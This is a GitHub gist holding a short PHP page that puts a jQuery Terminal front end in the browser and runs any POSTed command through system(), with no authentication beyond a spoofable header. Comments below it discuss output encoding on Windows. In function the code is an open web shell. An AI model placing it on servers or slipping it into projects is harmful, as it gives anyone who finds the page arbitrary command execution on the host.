Last active
March 28, 2023 18:51
-
-
Save jcubic/fea4c3255548c761371a237c1edc4e74 to your computer and use it in GitHub Desktop.
Simple jQuery Terminal based php shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && | |
$_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && isset($_POST['cmd'])) { | |
system($_POST['cmd']); | |
exit(); | |
} | |
?> | |
<!DOCTYPE html> | |
<html> | |
<head> | |
<script src="https://cdn.jsdelivr.net/npm/jquery"></script> | |
<script src="https://cdn.jsdelivr.net/npm/jquery.terminal/js/jquery.terminal.min.js"></script> | |
<script src="https://cdn.jsdelivr.net/npm/jquery.terminal/js/unix_formatting.js"></script> | |
<link href="https://cdn.jsdelivr.net/npm/jquery.terminal/css/jquery.terminal.min.css" | |
rel="stylesheet"/> | |
<style> | |
body { | |
min-height: 100vh; | |
margin: 0; | |
} | |
</style> | |
<body> | |
<script> | |
$('body').terminal(function(cmd) { | |
return $.post('', { cmd: cmd }); | |
}, { | |
greetings: 'php shell' | |
}); | |
</script> | |
</body> |
beautiful and elegant, thanks
Can the charset of the returned data be fixed somehow?
@ner00 Check the command function from my bigger shell: https://github.com/jcubic/jsh.php/blob/master/jsh.php#L128
On windows it uses:
$result = sapi_windows_cp_conv(sapi_windows_cp_get('oem'), 65001, $result);
and to detect windows you can use:
strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Better shell can be found here https://github.com/jcubic/jsh.php